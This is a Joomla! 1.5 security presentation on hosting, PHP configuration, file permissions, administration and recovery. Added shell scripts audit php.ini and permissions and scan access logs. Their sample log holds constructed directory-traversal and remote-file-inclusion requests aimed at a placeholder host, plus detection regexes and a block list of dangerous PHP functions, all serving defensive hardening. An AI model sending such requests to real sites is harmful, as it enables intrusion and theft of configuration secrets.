Joomladay Netherlands - Security

Joomla security presentation given at the Dutch Joomladay


Joomla! 1.5 Security. Joomla!day presentation, Utrecht, Netherlands, 12 June 2009

Is Joomla! safe?

Is the World Wide Web safe?

Is Joomla! safe?
"You know, I don't mean any disrespect, but I had to chuckle at the question 'Is Joomla! not safe?' since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking 'Is it safe?' and he's so desperate to get the dentist to stop that he says Yes or No or What do you want to hear?"
Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a

I would say: anyone who tells a community that a web site or an out-of-the-box solution is safe is not being responsible. No, it is not "safe" on the Internet.

What is this presentation about?

Presentation overview
- Getting started
- Hosting and server setup
- Joomla! setup
- Site administration
- Site recovery

Getting started

Getting started: some basic things before we go into details
- Report (possible) hacks to the JSST: http://developer.joomla.org/security/contact-the-team.html
- Please don't report hacks or proof-of-concepts out in the open; report them to the JSST as well
- Stay informed!
  - Automatic e-mail notification: http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
  - RSS feed: http://feeds.joomla.org/JoomlaSecurityNews

Hosting and server setup: shared hosting or dedicated hosting?

Hosting and server setup: "register_globals" and "open_basedir"

Hosting and server setup
- Configure Apache
  - Secure important areas with .htaccess
  - Use mod_rewrite and mod_security to block PHP attacks
- Configure MySQL
  - Implement user accounts on a "need-to-know" principle
- Configure PHP
  - Use PHP 5!
  - Configure your php.ini file properly (most of the time this is limited on shared hosts)

Configure php.ini
- Use "disable_functions" to disable dangerous PHP functions that your site does not need.
- Use PHP "open_basedir".
- Don't use PHP "safe_mode" (it gives a false sense of security).
- Don't use PHP "register_globals".
- Don't use PHP "allow_url_fopen". This option enables the URL-aware fopen wrappers, which allow URL objects to be accessed like files.
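As an added example, not from the slides: a POSIX shell audit that parses a php.ini fragment and reports which of the settings on this slide are still in the weak state. The two php.ini fragments and the disable_functions list are constructed for the demo, not taken from any real host.

```shell
#!/bin/sh
# Constructed php.ini fragments (not from the slides): WEAK_INI has the settings the
# slides warn against, HARDENED_INI the recommended equivalents.
WEAK_INI='register_globals = On
safe_mode = On
allow_url_fopen = On   ; remote URLs can be opened like local files
disable_functions =
; open_basedir is not set at all'
HARDENED_INI='register_globals = Off
safe_mode = Off
allow_url_fopen = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
open_basedir = /var/www/example/:/tmp/'

# ini_value INI_TEXT KEY: value assigned to KEY (last assignment wins, inline ";"
# comments and trailing blanks stripped); empty output when KEY is not set.
ini_value() {
  printf '%s\n' "$1" | sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" \
    | tail -n 1 | sed 's/[[:space:]]*;.*$//; s/[[:space:]]*$//'
}

# is_on VALUE: succeed when PHP would read VALUE as boolean "on".
is_on() {
  case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
    on|1|true|yes) return 0 ;;
    *) return 1 ;;
  esac
}

# audit_php_ini INI_TEXT: one "WEAK:" line per setting that contradicts the slides;
# prints nothing for a hardened file.
audit_php_ini() {
  for key in register_globals safe_mode allow_url_fopen; do
    is_on "$(ini_value "$1" "$key")" && echo "WEAK: $key is On; set $key = Off"
  done
  [ -n "$(ini_value "$1" disable_functions)" ] \
    || echo "WEAK: disable_functions is empty; list the functions the site never needs"
  [ -n "$(ini_value "$1" open_basedir)" ] \
    || echo "WEAK: open_basedir is unset; confine PHP to the site's directory tree"
}

# count_findings INI_TEXT: number of WEAK lines, handy in scripts and tests.
count_findings() { audit_php_ini "$1" | grep -c '^WEAK:' || true; }

echo "== weak php.ini ==";     audit_php_ini "$WEAK_INI"
echo "== hardened php.ini =="; audit_php_ini "$HARDENED_INI"
```

On a real host run it as `audit_php_ini "$(cat /path/to/php.ini)"`; on shared hosting where php.ini is read-only, the findings tell you what to ask the provider for.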
Joomla! setup

Joomla! setup: some basic rules to think about
- Only install official Joomla! versions!
- Change the default administrator username
- Protect directories and files
  - Move crucial files outside the public directory: http://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F
  - Ensure that all configurable paths to writable or uploadable directories
  - Protect your log directory (move it out of the document root or protect it with .htaccess)
- Adjust file and directory permissions
  - Set critical directories to 755
  - Set file permissions to 644
- Remove unneeded files
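An added example, not part of the original deck: a POSIX shell audit and fix for the 755/644 rule above, run against a constructed throw-away directory tree whose file names only imitate a Joomla! install. It separates the real security finding (world-writable paths, which anyone on a shared host can modify) from mere deviations from the rule of thumb.

```shell
#!/bin/sh
# Constructed throw-away Joomla!-like tree for the audit to inspect (not a real
# install); every mode is set explicitly so the result does not depend on umask.
ROOT=$(mktemp -d)
trap 'rm -rf "$ROOT"' EXIT
mkdir -p "$ROOT/administrator" "$ROOT/images/stories" "$ROOT/logs" "$ROOT/cache"
for f in index.php configuration.php administrator/index.php \
         images/stories/logo.gif logs/error.php cache/data.txt; do : > "$ROOT/$f"; done
find "$ROOT" -type d -exec chmod 755 {} +   # the 755 the slides ask for
find "$ROOT" -type f -exec chmod 644 {} +   # the 644 the slides ask for
chmod 777 "$ROOT/cache"                     # left wide open by a careless installer
chmod 666 "$ROOT/configuration.php"         # DB credentials, writable by everyone
chmod 600 "$ROOT/cache/data.txt"            # not 644, but not dangerous either

# list_paths DIR FIND_ARGS...: matching paths under DIR, relative and sorted.
list_paths() { d=$1; shift; ( cd "$d" && find . "$@" | sed 's|^\./||' | sort ); }

# world_writable DIR: files or directories anyone on the host can modify. On a
# shared host this is the finding to fix first.
world_writable() { list_paths "$1" -perm -002 \( -type f -o -type d \); }

# nonstandard_perms DIR: everything that deviates from the 755/644 rule of thumb.
nonstandard_perms() {
  list_paths "$1" \( -type d ! -perm 755 \) -o \( -type f ! -perm 644 \)
}

# fix_perms DIR: apply the slides' rule: directories 755, files 644.
fix_perms() {
  find "$1" -type d -exec chmod 755 {} +
  find "$1" -type f -exec chmod 644 {} +
}

echo "world-writable:";  world_writable "$ROOT"
echo "not 755/644:";     nonstandard_perms "$ROOT"
fix_perms "$ROOT"
echo "after fix_perms, not 755/644:"; nonstandard_perms "$ROOT"
```

Point the functions at the document root of a real site to audit it; run fix_perms only after checking that no extension needs a different mode for its upload directories.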
Joomla! setup: before you install extensions
- Always back up (even on your test system)
- Always test before you install on your live server
- Check for extension vulnerabilities
- Download from trusted sites
- User beware! Check the code quality
- Test! Test! Test!
- Remove junk files (everything that is not needed)
- Avoid encrypted code

Site administration

Site administration
- Use well-formed passwords
- Maintain a strong site backup process
- Monitor crack attempts (Tripwire, Samhain)
- Perform manual intrusion detection (manual log file scan)
- Stay current with security patches and upgrades

Site recovery
- Get help the right way
- Follow a logical and rigorous recovery process
- Reset your administrator password (and those of all admins/super admins)
- Find exploit attempts using the *NIX shell
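Added example, not from the slides, for the manual log file scan under "Site administration" and the shell-based search for exploit attempts under "Site recovery": POSIX shell functions that run over constructed Apache access_log lines and count the request patterns worth checking after a hack (directory traversal, remote URLs in query parameters, repeated POSTs to the administrator login). The IP addresses, component names and requests are made up for the demo.

```shell
#!/bin/sh
# Constructed Apache combined-format access_log lines (not real traffic) with the
# kinds of requests the slides tell you to look for in a manual log scan.
SAMPLE_LOG='203.0.113.5 - - [12/Jun/2009:10:00:01 +0200] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jun/2009:10:00:02 +0200] "GET /index.php?option=com_example&page=../../../configuration.php HTTP/1.1" 200 300 "-" "curl/7.19"
203.0.113.7 - - [12/Jun/2009:10:00:03 +0200] "GET /index.php?option=com_example&tpl=http://203.0.113.99/t.txt? HTTP/1.1" 500 0 "-" "curl/7.19"
203.0.113.9 - - [12/Jun/2009:10:00:04 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jun/2009:10:00:05 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jun/2009:10:00:06 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Jun/2009:10:00:07 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"'

# count_matching LOG REGEX: number of log lines matching REGEX (extended regex,
# case-insensitive); prints 0 rather than failing when nothing matches.
count_matching() { printf '%s\n' "$1" | grep -Eic "$2" || true; }

# traversal_hits LOG: requests carrying "../" in plain or URL-encoded form, the
# signature of attempts to read files outside the intended directory.
traversal_hits() { count_matching "$1" '"(GET|POST) [^"]*(\.\./|%2e%2e%2f)'; }

# remote_include_hits LOG: query parameters whose value is a full URL, which is
# what allow_url_fopen = On turns into a remote file inclusion risk.
remote_include_hits() { count_matching "$1" '"(GET|POST) [^"]*=(https?|ftp)://'; }

# admin_post_sources LOG MIN: client IPs that POSTed to /administrator/ at least
# MIN times, i.e. candidates for password guessing against the admin login.
admin_post_sources() {
  printf '%s\n' "$1" | awk -v min="$2" \
    '$6 == "\"POST" && $7 ~ /^\/administrator\// { n[$1]++ }
     END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }' | sort
}

echo "directory traversal attempts: $(traversal_hits "$SAMPLE_LOG")"
echo "remote URL in a parameter:    $(remote_include_hits "$SAMPLE_LOG")"
echo "repeated admin login POSTs (ip count):"; admin_post_sources "$SAMPLE_LOG" 3
```

Against a real server call the functions with `"$(cat /var/log/apache2/access_log)"` as the first argument; the counts are a starting point for reading the matching lines by hand, not a verdict.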
Links
- Documentation wiki: http://docs.joomla.org/Category:Security_Checklist
- Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html
- Report issues to the JSST: http://developer.joomla.org/security/contact-the-team.html

Sites to monitor when you take security seriously
Joomla! related
- www.joomla.org
- developer.joomla.org/security.html
- www.secunia.org
- www.milw0rm.com
Sites to put RSS feeds on
- http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
General
- www.us-cert.gov
- www.frsirt.com
Operating systems related
- www.debian.org/security
- www.openbsd.org/security
- www.redhat.org/apps/support

Questions?
